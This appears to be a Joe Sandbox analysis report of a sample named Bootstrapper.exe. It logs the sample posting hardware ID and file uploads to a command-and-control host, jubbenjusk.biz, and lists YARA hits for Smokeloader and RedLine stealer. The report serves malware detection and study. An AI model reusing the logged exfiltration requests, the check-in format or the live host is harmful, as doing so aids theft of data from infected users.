                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 19916
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:23 UTC | 15331 | OUT | Data Ascii:
                                                    --ZSLO3EWW2
                                                    Content-Disposition: form-data; name="hwid"

                                                    7AA4328D8341AA22B960CC18D99B375A
                                                    --ZSLO3EWW2
                                                    Content-Disposition: form-data; name="pid"

                                                    3
                                                    --ZSLO3EWW2
                                                    Content-Disposition: form-data; name="lid"

                                                    HpOoIh--2a727a032c4d
                                                    --ZSLO3EWW2
                                                    Conte
                                                    2025-01-12 06:10:23 UTC | 4585 | OUT | Data Raw: binary payload (mostly zero bytes, not printable)
                                                    2025-01-12 06:10:24 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=lk98j1hc46obggj7l9n8v46mhm; expires=Wed, 07 May 2025 23:57:02 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EjeOdmPaM1AxNBpPcb%2FpEyyhe7vjIdm5zkq41zAKRftKhz8lTZxrQw6aY7mLigyRXXP4%2FpzLg33RGfcW4Q%2BfHLyAi7Pvcf7yWI3B%2FzlWDleDKvdrzDSa22LrvQyEH9bRMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbb1081342aa-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1731&rtt_var=655&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2833&recv_bytes=20867&delivery_rate=1663817&cwnd=201&unsent_bytes=0&cid=55ea967a2f2ed39f&ts=643&x=0"
                                                    2025-01-12 06:10:24 UTC | 20 | IN | Data Ascii:
                                                    f
                                                    ok 8.46.123.189
                                                    2025-01-12 06:10:24 UTC | 5 | IN | Data Ascii:
                                                    0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.6 | 49737 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-12 06:10:25 UTC | 279 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=BD17OYCX7FQFJZ65XN
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1376
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:25 UTC | 1376 | OUT | Data Ascii:
                                                    --BD17OYCX7FQFJZ65XN
                                                    Content-Disposition: form-data; name="hwid"

                                                    7AA4328D8341AA22B960CC18D99B375A
                                                    --BD17OYCX7FQFJZ65XN
                                                    Content-Disposition: form-data; name="pid"

                                                    1
                                                    --BD17OYCX7FQFJZ65XN
                                                    Content-Disposition: form-data; name="lid"

                                                    HpOoIh--2a727
                                                    2025-01-12 06:10:25 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=6une3e8lhgvd73qnljulf1okui; expires=Wed, 07 May 2025 23:57:04 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4CvkZODKooxT6JNRiCkOEMld%2FaxCvAUnUYj1A7O9NgRLreiFVb%2BSeOwQ43%2B4QWCU%2Fjeur30bbHyWLbKFb2LRTi7w4mCeFvo9wW2ERL7%2BdN5%2BfizRFCc6A4Ey%2F%2BfUmBeOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbbda8b75e72-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1702&rtt_var=644&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2291&delivery_rate=1715628&cwnd=32&unsent_bytes=0&cid=656b70b3ebe511ed&ts=460&x=0"
                                                    2025-01-12 06:10:25 UTC | 20 | IN | Data Ascii:
                                                    f
                                                    ok 8.46.123.189
                                                    2025-01-12 06:10:25 UTC | 5 | IN | Data Ascii:
                                                    0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.6 | 49743 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-12 06:10:26 UTC | 277 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=TPXM9QB19SRT6UAF
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1106
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:26 UTC | 1106 | OUT | Data Ascii:
                                                    --TPXM9QB19SRT6UAF
                                                    Content-Disposition: form-data; name="hwid"

                                                    7AA4328D8341AA22B960CC18D99B375A
                                                    --TPXM9QB19SRT6UAF
                                                    Content-Disposition: form-data; name="pid"

                                                    1
                                                    --TPXM9QB19SRT6UAF
                                                    Content-Disposition: form-data; name="lid"

                                                    HpOoIh--2a727a032c4
                                                    2025-01-12 06:10:27 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=thdbo5n00p9945p36s4g3b3o17; expires=Wed, 07 May 2025 23:57:05 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCOSGMpAgWnKyLdI0gSYaOKKTsgrZkdmoIKYfcF2Y%2FjUnnVV%2B7txla4LTOJeeVQgfDyAdsmwB0384cLROn3xU%2BfQYZ8vbChy50ZkMAKiJuzF50te7UcECMl4ZEz%2FJ49NIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbc43d7f41b5-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1586&rtt_var=619&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2019&delivery_rate=1732937&cwnd=207&unsent_bytes=0&cid=0ca9e842422e3f23&ts=493&x=0"
                                                    2025-01-12 06:10:27 UTC | 20 | IN | Data Ascii:
                                                    f
                                                    ok 8.46.123.189
                                                    2025-01-12 06:10:27 UTC | 5 | IN | Data Ascii:
                                                    0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.6 | 49749 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-12 06:10:27 UTC | 263 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 121
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:27 UTC | 121 | OUT | Data Ascii:
                                                    act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7AA4328D8341AA22B960CC18D99B375A
                                                    2025-01-12 06:10:27 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=of1jfratrq8af5e0pjcac4unv1; expires=Wed, 07 May 2025 23:57:06 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OU6uhLMJdftBd1UwFpX3WwTR%2Fo4WKHqB6vklcJj50neX2InWF8KxaEuSLq2oWLGwVkokpGvn0LrYgd0y5rSbRfkEdzIFjcOjiiVVudfK7lk%2B0Ilc2vRjButeIqjf%2B%2FHN6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbca9ebd4235-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1608&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1020&delivery_rate=1792510&cwnd=248&unsent_bytes=0&cid=72b3781112ff910a&ts=439&x=0"
                                                    2025-01-12 06:10:27 UTC | 54 | IN | Data Ascii:
                                                    30
                                                    g/8mYVRArN2g8EEN0npDEZ4CNa02Fkf4qSApz5snUe7Yog==
                                                    2025-01-12 06:10:27 UTC | 5 | IN | Data Ascii:
                                                    0



                                                    Target ID:0
                                                    Start time:01:10:14
                                                    Start date:12/01/2025
                                                    Path:C:\Users\user\Desktop\Bootstrapper.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Bootstrapper.exe"
                                                    Imagebase:0x400000
                                                    File size:404'992 bytes
                                                    MD5 hash:A9370DF5FB60672577FD727E3E798E75
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:01:10:28
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900
                                                    Imagebase:0x80000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.2265953787.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Offset: 02F07000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_2f06000_Bootstrapper.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$8$:$<
                                                      • API String ID: 0-2010585708
                                                      • Opcode ID: 67d60451abf46a8440329f7e17f9384f2203ee1c00ecdfc304c394ed18c3e430
                                                      • Instruction ID: 9334ca420581606e17f75547198c5e365f68d9162b45647e32704c29d22ca51e
                                                      • Opcode Fuzzy Hash: 67d60451abf46a8440329f7e17f9384f2203ee1c00ecdfc304c394ed18c3e430
                                                      • Instruction Fuzzy Hash: 8981CF9650E3C01FE71397704C79A50BFB52E23148B1E82CFC4C98E5E7D759A90AE326